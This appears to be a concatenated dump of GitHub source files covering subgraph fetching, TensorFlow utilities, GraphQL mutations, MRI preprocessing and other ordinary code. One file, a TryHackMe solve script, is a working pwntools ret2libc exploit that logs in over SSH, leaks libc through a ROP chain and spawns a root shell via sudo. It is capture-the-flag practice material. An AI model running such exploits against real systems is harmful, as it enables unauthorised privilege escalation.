FetchStatus.FAIL:\n return False\n\n self._fetch_status = FetchStatus.IN_PROGRESS\n return True\n\n def _handle_response(\n self,\n subgraph: ApiSpecs,\n res: Optional[Dict],\n res_context: str,\n sleep_on_fail: bool = True,\n ) -> Generator[None, None, Optional[Any]]:\n \"\"\"Handle a response from a subgraph.\n\n :param subgraph: the subgraph to handle the response for.\n :param res: the response to handle.\n :param res_context: the context of the current response.\n :param sleep_on_fail: whether we want to sleep if we fail to get the response's result.\n :return: the response's result, using the given keys. `None` if response is `None` (has failed).\n :yield: None\n \"\"\"\n if res is None:\n self.context.logger.error(\n f\"Could not get {res_context} from {subgraph.api_id}\"\n )\n self._call_failed = True\n subgraph.increment_retries()\n\n if subgraph.is_retries_exceeded():\n self._fetch_status = FetchStatus.FAIL\n\n if sleep_on_fail:\n sleep_time = subgraph.retries_info.suggested_sleep_time\n yield from self.sleep(sleep_time)\n return None\n\n self.context.logger.info(f\"Retrieved {res_context}: {res}.\")\n self._call_failed = False\n subgraph.reset_retries()\n self._fetch_status = FetchStatus.SUCCESS\n return res\n\n def _fetch_bets(self) -> Generator[None, None, Optional[list]]:\n \"\"\"Fetch questions from the current subgraph, for the current creators.\"\"\"\n self._fetch_status = FetchStatus.IN_PROGRESS\n\n query = questions.substitute(\n creators=to_graphql_list(self._current_creators),\n slot_count=self.params.slot_count,\n opening_threshold=self.synced_time + self.params.opening_margin,\n languages=to_graphql_list(self.params.languages),\n )\n\n res_raw = yield from self.get_http_response(\n content=to_content(query),\n **self.current_subgraph.get_spec(),\n )\n res = self.current_subgraph.process_response(res_raw)\n\n bets = yield from self._handle_response(\n self.current_subgraph,\n res,\n res_context=\"questions\",\n )\n\n return bets\n\n def _fetch_redeem_info(self) -> Generator[None, None, Optional[list]]:\n \"\"\"Fetch redeeming information from the current subgraph.\"\"\"\n self._fetch_status = FetchStatus.IN_PROGRESS\n\n current_subgraph = self.context.trades_subgraph\n safe = self.synchronized_data.safe_contract_address\n creation_timestamp_gt = (\n 0 # used to allow for batching based on creation timestamp\n )\n all_trades: List[Dict[str, Any]] = []\n # fetch trades in batches of `QUERY_BATCH_SIZE`\n while True:\n query = trades.substitute(\n creator=safe.lower(),\n first=QUERY_BATCH_SIZE,\n creationTimestamp_gt=creation_timestamp_gt,\n )\n\n res_raw = yield from self.get_http_response(\n content=to_content(query),\n **current_subgraph.get_spec(),\n )\n res = current_subgraph.process_response(res_raw)\n trades_chunk = yield from self._handle_response(\n current_subgraph,\n res,\n res_context=\"trades\",\n )\n if res is None:\n # something went wrong\n self.context.logger.error(\"Failed to process all trades.\")\n return all_trades\n\n trades_chunk = cast(List[Dict[str, Any]], trades_chunk)\n if len(trades_chunk) == 0:\n # no more trades to fetch\n return all_trades\n\n # this is the last trade's creation timestamp\n # they are sorted by creation timestamp in ascending order\n # so we can use this to fetch the next batch\n creation_timestamp_gt = trades_chunk[-1][\"fpmm\"][\"creationTimestamp\"]\n all_trades.extend(trades_chunk)\n\n def _fetch_block_number(\n self, timestamp: int\n ) -> Generator[None, None, Dict[str, str]]:\n \"\"\"Get a block number by its timestamp.\"\"\"\n self._fetch_status = FetchStatus.IN_PROGRESS\n\n margin = self.params.average_block_time * self.params.abt_error_mult\n query = block_number.substitute(\n timestamp_from=timestamp, timestamp_to=timestamp + margin\n )\n\n current_subgraph = self.context.network_subgraph\n res_raw = yield from self.get_http_response(\n content=to_content(query),\n **current_subgraph.get_spec(),\n )\n res = current_subgraph.process_response(res_raw)\n\n block = yield from self._handle_response(\n current_subgraph,\n res,\n res_context=\"block number\",\n )\n\n return {} if block is None else block\n\n def fetch_claim_params(\n self, question_id: str\n ) -> Generator[None, None, Optional[List[Dict[str, Any]]]]:\n \"\"\"Fetch claim parameters from the subgraph.\"\"\"\n self._fetch_status = FetchStatus.IN_PROGRESS\n current_subgraph = self.context.realitio_subgraph\n query = answers_query.substitute(\n question_id=question_id,\n )\n res_raw = yield from self.get_http_response(\n content=to_content(query),\n **current_subgraph.get_spec(),\n )\n res = current_subgraph.process_response(res_raw)\n raw_answers = yield from self._handle_response(\n current_subgraph,\n res,\n res_context=\"answers\",\n )\n if raw_answers is None:\n # we failed to get the answers\n self.context.logger.error(\n f\"Failing to get answers for question {question_id} from {current_subgraph.api_id}\"\n )\n return None\n answers = [\n {\n \"args\": {\n \"answer\": bytes.fromhex(answer[\"answer\"][2:]),\n \"question_id\": bytes.fromhex(answer[\"question\"][\"questionId\"][2:]),\n \"history_hash\": bytes.fromhex(\n answer[\"question\"][\"historyHash\"][2:]\n ),\n \"user\": Web3.to_checksum_address(answer[\"question\"][\"user\"]),\n \"bond\": int(answer[\"bondAggregate\"]),\n \"timestamp\": int(answer[\"timestamp\"]),\n \"is_commitment\": False,\n }\n }\n for answer in raw_answers\n ]\n return answers\n\n def fetch_trades(\n self,\n creator: str,\n from_timestamp: float,\n to_timestamp: float,\n ) -> Generator[None, None, Optional[List[Dict[str, Any]]]]:\n \"\"\"Fetch trades from the subgraph.\"\"\"\n self._fetch_status = FetchStatus.IN_PROGRESS\n current_subgraph = self.context.trades_subgraph\n\n all_trades: List[Dict[str, Any]] = []\n creation_timestamp_gt = (\n 0 # used to allow for batching based on creation timestamp\n )\n # fetch trades in batches of `QUERY_BATCH_SIZE`\n while True:\n query = trades_query.substitute(\n creator=creator.lower(),\n creationTimestamp_lte=int(to_timestamp),\n creationTimestamp_gte=int(from_timestamp),\n first=QUERY_BATCH_SIZE,\n creationTimestamp_gt=creation_timestamp_gt,\n )\n\n res_raw = yield from self.get_http_response(\n content=to_content(query),\n **current_subgraph.get_spec(),\n )\n res = current_subgraph.process_response(res_raw)\n trades_chunk = yield from self._handle_response(\n current_subgraph,\n res,\n res_context=\"trades\",\n )\n if res is None:\n # something went wrong\n self.context.logger.error(\"Failed to process all trades.\")\n return all_trades\n\n trades_chunk = cast(List[Dict[str, Any]], trades_chunk)\n if len(trades_chunk) == 0:\n # no more trades to fetch\n return all_trades\n\n # this is the last trade's creation timestamp\n # they are sorted by creation timestamp in ascending order\n # so we can use this to fetch the next batch\n creation_timestamp_gt = trades_chunk[-1][\"creationTimestamp\"]\n all_trades.extend(trades_chunk)\n\n def fetch_user_positions(\n self, user: str\n ) -> Generator[None, None, Optional[List[Dict[str, Any]]]]:\n \"\"\"Fetch positions for a user from the subgraph.\"\"\"\n self._fetch_status = FetchStatus.IN_PROGRESS\n current_subgraph = self.context.conditional_tokens_subgraph\n\n user_positions_id_gt = (\n 0 # used to allow for batching based on user positions id\n )\n all_positions: List[Dict[str, Any]] = []\n while True:\n query = user_positions_query.substitute(\n id=user.lower(),\n first=QUERY_BATCH_SIZE,\n userPositions_id_gt=user_positions_id_gt,\n )\n res_raw = yield from self.get_http_response(\n content=to_content(query),\n **current_subgraph.get_spec(),\n )\n res = current_subgraph.process_response(res_raw)\n\n positions = yield from self._handle_response(\n current_subgraph,\n res,\n res_context=\"positions\",\n )\n if res is None:\n # something went wrong\n self.context.logger.error(\"Failed to process all positions.\")\n return all_positions\n\n positions = cast(List[Dict[str, Any]], positions)\n if len(positions) == 0:\n # no more positions to fetch\n return all_positions\n\n all_positions.extend(positions)\n user_positions_id_gt = positions[-1][\"id\"]\n","repo_name":"valory-xyz/trader","sub_path":"packages/valory/skills/market_manager_abci/graph_tooling/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":13776,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"1385501734","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport tensorflow as tf\n\nfrom model import AutoEncoder\n\n\ndef restore(sess, saver, restore_dir):\n \"\"\"\n Restore model\n\n :param sess: tensorflow session\n :param saver: tensorflow saver\n :param restore_dir: the directory for restore\n :return:\n \"\"\"\n checkpoint = tf.train.get_checkpoint_state(restore_dir)\n if checkpoint is None:\n raise FileNotFoundError('not found model: {}'.format(restore_dir))\n\n saver.restore(sess, checkpoint.model_checkpoint_path)\n\n\ndef get_network(args_hiddens, logger=None):\n \"\"\"\n get autoencoder\n\n :param args_hiddens: args.hiddens (comma separated)\n :param logger: logger\n :return: autoencoder model\n \"\"\"\n hidden_dims = [int(h) for h in args_hiddens.split(',')]\n return AutoEncoder(hidden_dims, logger=logger)\n\n\ndef build_graph(network, input_shape, dtype=tf.float64):\n \"\"\"\n build graph\n\n :param network: network(model)\n :param input_shape: input data's shape\n :param dtype: type of input data\n :return: sess, saver\n \"\"\"\n with tf.Graph().as_default():\n x_ph = tf.placeholder(dtype=dtype, shape=input_shape)\n network.build_graph(x_ph)\n sess = tf.Session()\n saver = tf.train.Saver()\n init_op = tf.global_variables_initializer()\n\n return sess, saver, init_op","repo_name":"dltkr77/tensorflow-autoencoder","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"21744470899","text":"from pwn import *\n\n#initializing binary, elf, libc etc.,\ncontext.binary = binary = './exploit_me'\ncontext.arch = 'amd64'\n\nelf = ELF(binary)\nrop = ROP(elf)\n\n#padding, payloads and rop calls for address leak\npadding = b\"A\"*40\nrop.call(elf.sym['puts'], [elf.got.puts]) #calling puts to get the address of puts\nrop.call(elf.sym['main']) #returning execution back to main function\n\npayload = flat(\n padding, rop.chain()) #chaining our inital payload together\n\n#processes, interaction, finding puts leak\nshell = ssh('zeeshan', '10.10.124.87', keyfile='id_rsa', port=22) #using ssh to login with pwntools\n#io = process(binary)\nio = shell.process(['sudo','./exploit_me']) #starting process with sudo\n\nio.recvline()\nio.sendline(payload)\nleak = u64(io.recvline().rstrip().ljust(8,b'\\0'))\nlog.info(f\"Found puts leak at => {hex(leak)}\")\n\n#calculating base address of libc and rebasing\n#matching leaked puts address with https://libc.blukat.me/ we get the required libc(amd64)\nlibc = ELF('libc6_2.23-0ubuntu11.2_amd64.so', checksec=False)\nlibc.address = leak - libc.sym['puts']\nlog.info(f\"base address libc => {hex(libc.address)}\")\n\n#final payload to call /bin/sh\npayload = padding\npayload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])\npayload += p64(next(libc.search(b'/bin/sh')))\npayload += p64(rop.find_gadget(['ret'])[0])\npayload += p64(libc.symbols.system)\n\n#poping shell\nio.recvline()\nio.sendline(payload)\n\nio.interactive()\n","repo_name":"markuched13/markuched13.github.io","sub_path":"solvescript/thm/obscure/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7817692550","text":"import SimpleITK as sitk\nfrom .. import __path as path\nfrom .. import __files as files\n\ndef process(data):\n\tfor mod in [\"path_T1\", \"path_T2\", \"path_FLAIR\"]:\n\t\tfilename = data[mod+\"_pre\"] if path.isfile(data[mod+\"_pre\"]) else data[mod]\n\t\tA = (filename)\n\n\t\tinputImage = sitk.ReadImage(A)\n\t\tinputImage = sitk.Cast(inputImage,sitk.sitkFloat32)\n\t\tcorrector = sitk.N4BiasFieldCorrectionImageFilter()\n\n\t\toutput = corrector.Execute(inputImage)\n\t\tnome = path.join(path.dirname(data[mod+\"_pre\"]), \"t\"+path.lastname(data[mod+\"_pre\"]))\n\t\t#nome = nome.encode(\"utf-8\")\n\t\tsitk.WriteImage(output, nome)\n\n\t\tfiles.replace(nome, data[mod+\"_pre\"])","repo_name":"ReplicAI/UniMRI","sub_path":"imsmri/__preprocess/__N4.py","file_name":"__N4.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42453489779","text":"class Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n for idx, num in enumerate(nums):\n try:\n other_idx = nums.index(target - num)\n if other_idx != idx:\n return [idx, other_idx]\n except ValueError:\n continue","repo_name":"versenyi98/programming-contests","sub_path":"LeetCode/0001. Two Sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37223053698","text":"import graphene\nfrom ..types.WorkoutType import WorkoutType\nfrom ...models import Workout, Program\n\n\nclass WorkoutMutationAdd(graphene.Mutation):\n class Arguments:\n name = graphene.String(required=True)\n date = graphene.Date(required=True)\n program_id = graphene.Int(required=True)\n\n workout = graphene.Field(WorkoutType)\n\n @classmethod\n def mutate(cls, root, info, name, date, program_id):\n program = Program.objects.get(id=program_id)\n workout = Workout(name=name, date=date, program=program)\n workout.save()\n return WorkoutMutationAdd(workout=workout)\n\n\nclass WorkoutMutationUpdate(graphene.Mutation):\n class Arguments:\n id = graphene.Int(required=True)\n name = graphene.String()\n date = graphene.Date()\n program_id = graphene.Int()\n\n workout = graphene.Field(WorkoutType)\n\n @classmethod\n def mutate(cls, root, info, id, name=None, date=None, program_id=None):\n workout = Workout.objects.get(id=id)\n if name is not None:\n workout.name = name\n if date is not None:\n workout.date = date\n if program_id is not None:\n program = Program.objects.get(id=program_id)\n workout.program = program\n workout.save()\n return WorkoutMutationUpdate(workout=workout)\n\n\nclass WorkoutMutationDelete(graphene.Mutation):\n class Arguments:\n id = graphene.Int(required=True)\n\n workout = graphene.Field(WorkoutType)\n\n @classmethod\n def mutate(cls, root, info, id):\n workout = Workout.objects.get(id=id)\n workout.delete()\n return True\n\n\nclass WorkoutMutations(graphene.ObjectType):\n add_workout = WorkoutMutationAdd.Field()\n update_workout = WorkoutMutationUpdate.Field()\n delete_workout = WorkoutMutationDelete.Field()\n","repo_name":"doanlng/fitrack","sub_path":"polls/schema/mutations/WorkoutMutations.py","file_name":"WorkoutMutations.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41028540291","text":"import json\nimport csv\nimport matplotlib.pyplot as plt\nimport torch\nimport shutil\nimport datetime\nimport os\n\ndef load_txt(txt_dir, txt_name):\n List = []\n with open(txt_dir + txt_name, 'r') as f:\n for line in f:\n List.append(line.strip('\\n').replace('.nii', '.npy'))\n return List\n\ndef read_json(config_file):\n with open(config_file) as config_buffer:\n config = json.loads(config_buffer.read())\n return config\n\ndef read_csv(filename):\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n your_list = list(reader)\n filenames = [a[0] for a in your_list[1:]]\n labels = [0 if a[1]=='CN' else 1 for a in your_list[1:]]\n return filenames, labels\n\ndef load_config():\n config = read_json('./config.json')\n return config\n\ndef stack_plot(stack,rows=6,cols=6,start_with=10,show_every=5,subtitle='title'):\n fig,ax = plt.subplots(rows,cols,figsize=[12,12])\n plt.suptitle(subtitle)\n for i in range(rows*cols):\n ind = start_with = i*show_every\n ax[int(i / rows),int(i % rows)].set_title('slice %d'%ind)\n ax[int(i / rows),int(i % rows)].imshow(stack[:,:,ind],cmap='gray')\n ax[int(i / rows),int(i % rows)].axis('off')\n plt.show()\n\ndef image_plot(img):\n plt.imshow(img,cmap='gray')\n \n \nclass Logger(object):\n def __init__(self, path, header):\n self.log_file = open(path, 'w')\n self.logger = csv.writer(self.log_file, delimiter='\\t')\n\n self.logger.writerow(header)\n self.header = header\n \n def __del(self):\n self.log_file.close()\n \n def log(self, values):\n write_values = []\n for col in self.header:\n assert col in values\n write_values.append(values[col])\n\n self.logger.writerow(write_values)\n self.log_file.flush()\n\n\nclass AverageMeter(object):\n def __init__(self, name, fmt=':f'):\n self.name = name\n self.fmt = fmt\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n \n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n \n def __str__(self):\n fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print('\\t'.join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n \ndef create_storename(config):\n log_path = config['result_path']\n log_date = config['save_datetime'] \n model_name = config['model']['model_name']\n model_depth = config['model']['model_depth']\n store_name = model_name + str(model_depth) +'_' + log_date\n full_path = os.path.join(log_path,store_name)\n os.makedirs(full_path, exist_ok = True)\n \n return full_path,store_name\n\ndef save_messgage(config,**kwargs):\n\n from collections import OrderedDict\n\n log_path, store_name = create_storename(config)\n path = os.path.join(log_path,store_name+'.json')\n json_data = OrderedDict()\n\n if kwargs:\n json_data=kwargs\n\n with open(path, 'w') as outfile:\n json.dump(json_data, outfile)\n\n\n \ndef save_checkpoint(state, is_best, config):\n\n log_path, store_name = create_storename(config)\n \n torch.save(state, '%s/%s_checkpoint.pth' % (log_path, store_name))\n if is_best:\n shutil.copyfile('%s/%s_checkpoint.pth' % (log_path, store_name),'%s/%s_best.pth' % (log_path, store_name))","repo_name":"tourbut/BrainMR_MCI","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"1671077516","text":"import numpy as np\r\nfrom astropy.io import fits\r\nimport cv2\r\nimport os\r\nimport pickle\r\n\r\ndef mean_fits(path_to_file,loadfile):\r\n base_path = path_to_file\r\n total_files = len(os.listdir(base_path))\r\n print(\"the number of total fits images are:\",total_files)\r\n print(\"\\n\")\r\n stack=np.zeros(shape=(2048,2060))\r\n for file in os.listdir(base_path):\r\n hdulist = fits.open(os.path.join(base_path,file))\r\n image = hdulist[0].data\r\n stack = np.add(stack , image)\r\n mean_stack = np.divide(stack,total_files)\r\n file = open(loadfile,'wb')\r\n try:\r\n pickle.dump(mean_stack, file)\r\n file.close()\r\n return 1\r\n except:\r\n print(\"error in dumping the files\")\r\n return 0\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n path = \"E:\\MASTDARK\"\r\n print(mean_fits(path,'mean_dark'))\r\n","repo_name":"DivyanshuTak/chromospheric_photospheric_image_corelation","sub_path":"mean_fits.py","file_name":"mean_fits.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26797175911","text":"'''\nCreated on 9 Dec 2013\n'''\n\nfrom pymongo import MongoClient\n\nclass MongoDb(object):\n '''\n classdocs\n '''\n def __init__(self, host, port):\n self.client = MongoClient(host, port)\n \n def pushData(self, titlesDict, seriesName, seasonNumber):\n db = self.client[seriesName]\n self.saveToDatabase(db['Season' + str(seasonNumber)], titlesDict)\n\n def saveToDatabase(self, collection, titlesDict):\n for episode in titlesDict.keys():\n existingDocument = collection.find_one(episode)\n if not existingDocument:\n data = {'_id': episode,\n 'title': titlesDict.get(episode)}\n \n collection.insert(data) \n \n def pushSeries(self, seriesName, seasonNumber, wikiPath, seasonAnchor):\n db = self.client['series-list']\n collection = db[seriesName]\n \n data = {'_id': seasonNumber, \n 'wikiPath': wikiPath,\n 'seasonAnchor': seasonAnchor\n }\n \n collection.insert(data) \n \n def getSeries(self, seriesName, seasonNumber): \n db = self.client['series-list']\n return db[seriesName].find_one({'_id': str(seasonNumber)})\n ","repo_name":"luca-mandrioli/SeriesParser","sub_path":"com/mandrocker/series/db/MongoDb.py","file_name":"MongoDb.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2841943127","text":"def sort(array):\n minOutofOrder = float(\"inf\")\n maxOutOrder = float(\"-inf\")\n for i in range(len(array)):\n num = array[i]\n if isOutofOrder(i, num, array):\n minOutofOrder = min(minOutofOrder, num)\n maxOutOrder = max(maxOutOrder, num)\n if minOutofOrder == float(\"inf\"):\n return [-1, 1]\n leftIndex = 0\n while minOutofOrder >= array[leftIndex]:\n leftIndex += 1\n rightIndex = len(array) - 1\n while maxOutOrder <= array[rightIndex]:\n rightIndex -= 1\n return [leftIndex, rightIndex]\n\n\ndef isOutofOrder(i, num, array):\n if i == 0:\n return num > array[i + 1]\n if i == len(array) - 1:\n return num < array[i - 1]\n return num > array[i+ 1] or num < array[i- 1]\n","repo_name":"onkarj-98/Data_structures_and_Algorithms","sub_path":"Array/subArraySort.py","file_name":"subArraySort.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"43974956396","text":"import csv\nimport os\nimport re\n\n\ndef create_csv() -> None:\n f0 = \"datasets/\"\n fold0 = os.listdir(f0)\n\n with open(\"patient.csv\", \"w\") as pat:\n pat_writer = csv.writer(pat, delimiter=\",\", quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n pat_writer.writerow([\"name_file\", \"name_folder\", \"fna\", \"tirad\"])\n\n for root, dirs, files in os.walk(f0, topdown=True):\n if \".exports\" in root:\n continue\n if \"tirad\" in root.lower():\n regex = re.search(r\"[T|t]irads.*(\\d{1}\\w{0,1}).+\", root)\n if regex == None:\n print(root)\n if \"IVa\" in root:\n tirad = \"4a\"\n else:\n tirad = regex.group(1)\n # print(tirad)\n\n if \"lanh\" in root or \"lành\" in root:\n fna = 0\n elif \"ac\" in root:\n fna = 1\n else:\n fna = 2\n\n for file_name in files:\n a = [file_name, root, fna, tirad]\n print(a)\n pat_writer.writerow(a)\n\n\n__all_ = [\"create_csv\"]\n","repo_name":"blueyellowpink/thyroid","sub_path":"utils/create_csv.py","file_name":"create_csv.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6731384466","text":"import os\nfrom waflib.Task import Task\nfrom waflib.TaskGen import feature, before_method, after_method\n\nFEATURE = 'flexnet_trial'\n\ndef configure(conf):\n\tj = os.path.join\n\n\tconf.find_program('java')\n\n\tflexnet_dir = j(conf.get_third_party(), 'flexnet_client-2016.08')\n\tidentity = j(flexnet_dir, 'IdentityBackOffice.bin')\n\ttools = j(flexnet_dir, 'tools')\n\tclass_path = [\n\t\tj(tools, 'flxTools.jar'),\n\t\tj(tools, 'flxBinary.jar'),\n\t\tj(tools, 'EccpressoAll.jar'),\n\t\tj(tools, 'commons-codec-1.9.jar'),\n\t]\n\n\tconf.env['FLEXNET_TRIAL_OPTS'] = [\n\t\t'-cp', os.pathsep.join(class_path),\n\t\t'com.flexnet.lm.tools.TrialFileUtil',\n\t\t'-id', identity\n\t]\n\n\tconf.env.append_value('supported_features', FEATURE)\n\n@feature(FEATURE)\n@before_method('process_source')\ndef generate_flexnet_trial(self):\n\tsrc = getattr(self, 'flexnet_input', None)\n\tif not src:\n\t\tself.generator.bld.fatal('flexnet_input must be specified')\n\n\tproduct = getattr(self, 'flexnet_product', None)\n\tif not product:\n\t\tself.generator.bld.fatal('flexnet_product must be specified')\n\tself.env['FLEXNET_PRODUCT'] = product\n\n\tinst_to = getattr(self, 'install_path', '${BINDIR}')\n\tnode = self.path.find_resource(src)\n\ttgt = getattr(self, 'flexnet_output', None)\n\tif tgt is None:\n\t\ttask = self.create_task('flexnet_trial', node, node.change_ext('.bin'))\n\t\tself.install_files(inst_to, task.outputs)\n\telse:\n\t\ttask = self.create_task('flexnet_trial', node, tgt)\n\t\tif not tgt.is_src():\n\t\t\tself.install_files(inst_to, tgt)\n\nclass flexnet_trial(Task):\n\trun_str = '${JAVA} ${FLEXNET_TRIAL_OPTS} -product {FLEXNET_PRODUCT} ${SRC} ${TGT}'\n\tvars = [ 'FLEXNET_TRIAL_OPTS', 'FLEXNET_PRODUCT' ]\n","repo_name":"sfncat/peach","sub_path":"pfce/pfce_src/build/tools/flexnet.py","file_name":"flexnet.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"33985767827","text":"from django.urls import path, re_path, include\n\n# from . import views\nfrom . import views\n\nurlpatterns = [\n # path('list/', views.user_list_view),\n # path('item/', views.UserListItem.as_view()),\n path('login/', views.LoginView.as_view()),\n path('signup/', views.Signup.as_view()),\n path('list/', views.AllUsers.as_view()),\n path('edit/', views.ProfileEdit.as_view()),\n\n # path('', include('django.contrib.auth.urls')), # new\n]","repo_name":"mahtaakhyani/Django","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5561436286","text":"#\n# FAKE-COIN problem model (alternative) for COBRA\n#\n\nN = 12\nsrange = lambda s, n: [s + str(i) for i in range(1, n+1)]\n\nVARIABLES(srange(\"y\", N) + srange(\"x\", N))\nCONSTRAINT(\"Exactly-1(%s, %s)\" % (\",\".join(srange(\"x\", N)), \",\".join(srange(\"y\", N))))\n\nALPHABET(srange(\"\", N))\nMAPPING(\"X\", [\"x\"+str(i) for i in range(1, N + 1)])\nMAPPING(\"Y\", [\"y\"+str(i) for i in range(1, N + 1)])\n\n# Helper function for generating strings representing list\n# For example, params(\"X\", 2, 5) = \"X$2, X$3, X$4, X$5\"\nparams = lambda s, n0, n1: \",\".join(s + \"$\" + str(i) for i in range(n0, n1+1))\n\nfor m in range(1, N//2 + 1):\n # weighting m coins agains m coins\n EXPERIMENT(\"weighing\" + str(m), 2*m)\n PARAMS_DISTINCT(range(1, 2*m + 1))\n PARAMS_SORTED(range(1, m + 1))\n PARAMS_SORTED(range(m+1, 2*m + 1))\n PARAMS_SORTED([1, m + 1])\n\n # left side is lighter\n OUTCOME(\"lighter\", \"Or(%s) | Or(%s)\" % (params(\"X\", 1, m), params(\"Y\", m+1, 2*m)))\n OUTCOME(\"heavier\",\"Or(%s) | Or(%s)\" % (params(\"Y\", 1, m), params(\"X\", m+1, 2*m)))\n\n # both sides weight the same\n OUTCOME(\"same\",\"!Or(%s,%s)\" % (params(\"X\", 1, 2*m), params(\"Y\", 1, 2*m)))","repo_name":"mirek26/cobra","sub_path":"cobra/examples/counterfeit-coin-24.py","file_name":"counterfeit-coin-24.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12458071667","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport os\nimport io\nimport sys\nimport unittest\nfrom io import open\n\nimport mock\n\nfrom scalyr_agent.test_base import skipIf\n\nBASE_DIR = os.path.abspath(os.path.dirname(os.path.abspath(__file__)))\n\nMODULE_PATH = os.path.abspath(\n os.path.join(BASE_DIR, \"../../../scalyr_agent/third_party/tcollector/collectors/0\")\n)\nFIXTURES_DIR = os.path.abspath(os.path.join(BASE_DIR, \"../fixtures/netstat\"))\nsys.path.append(MODULE_PATH)\n\n# pylint: disable=import-error\n# type: ignore\nif sys.platform.startswith(\"win\"):\n parse_and_print_metrics = None\nelse:\n from netstat import parse_and_print_metrics\n\n\nclass NetStatTcollectorTestCase(unittest.TestCase):\n @skipIf(\n not parse_and_print_metrics, \"Skipping Linux only test on unsupported platform\"\n )\n @mock.patch(\"netstat.time.time\", mock.Mock(return_value=100))\n def test_verify_proc_netstat_kernel_5_11(self):\n file_path_netstat = os.path.join(\n FIXTURES_DIR, \"netstat_ubuntu_20_04_kernel_5.11.0.txt\"\n )\n file_path_sockstat = os.path.join(\n FIXTURES_DIR, \"sockstat_ubuntu_20_04_kernel_5.11.0.txt\"\n )\n\n output_file_sucess = io.StringIO()\n output_file_error = io.StringIO()\n\n with open(file_path_netstat, \"r\") as f_netstat, open(\n file_path_sockstat, \"r\"\n ) as f_sockstat:\n parse_and_print_metrics(\n f_netstat, f_sockstat, output_file_sucess, output_file_error\n )\n\n output_success = output_file_sucess.getvalue()\n output_error = output_file_error.getvalue()\n output_success_lines = output_success.strip().split(\"\\n\")\n\n self.assertEqual(output_error, \"\")\n self.assertEqual(\n output_success_lines[0], \"net.sockstat.num_sockets 100 4 type=tcp\"\n )\n self.assertEqual(\n output_success_lines[-1], \"net.stat.tcp.receive.queue.full 100 0\"\n )\n self.assertEqual(len(output_success_lines), 40)\n","repo_name":"scalyr/scalyr-agent-2","sub_path":"tests/unit/builtin_monitors/netstat_tcollector_test.py","file_name":"netstat_tcollector_test.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"48"} +{"seq_id":"16000672612","text":"from collections import defaultdict\nimport torch\nimport numpy as np\nimport scipy.sparse as sp\n\n\ndef convert_sp_mat_to_sp_tensor(X):\n \"\"\"Convert raw sp matrix into sparse tensor\"\"\"\n coo = X.tocoo().astype(np.float32)\n row = torch.Tensor(coo.row).long()\n col = torch.Tensor(coo.col).long()\n index = torch.stack([row, col])\n data = torch.FloatTensor(coo.data)\n return torch.sparse.FloatTensor(index, data, torch.Size(coo.shape))\n\n\ndef compute_normalize_adj(adj):\n row_sum = np.array(adj.sum(1))\n d_inv = np.power(row_sum, -0.5).flatten()\n d_inv[np.isinf(d_inv)] = 0.\n d_mat_inv = sp.diags(d_inv)\n norm_adj = d_mat_inv.dot(adj).dot(d_mat_inv)\n return norm_adj\n\n\ndef load_file_to_dict_format(filename):\n \"\"\"Convert data into Dict 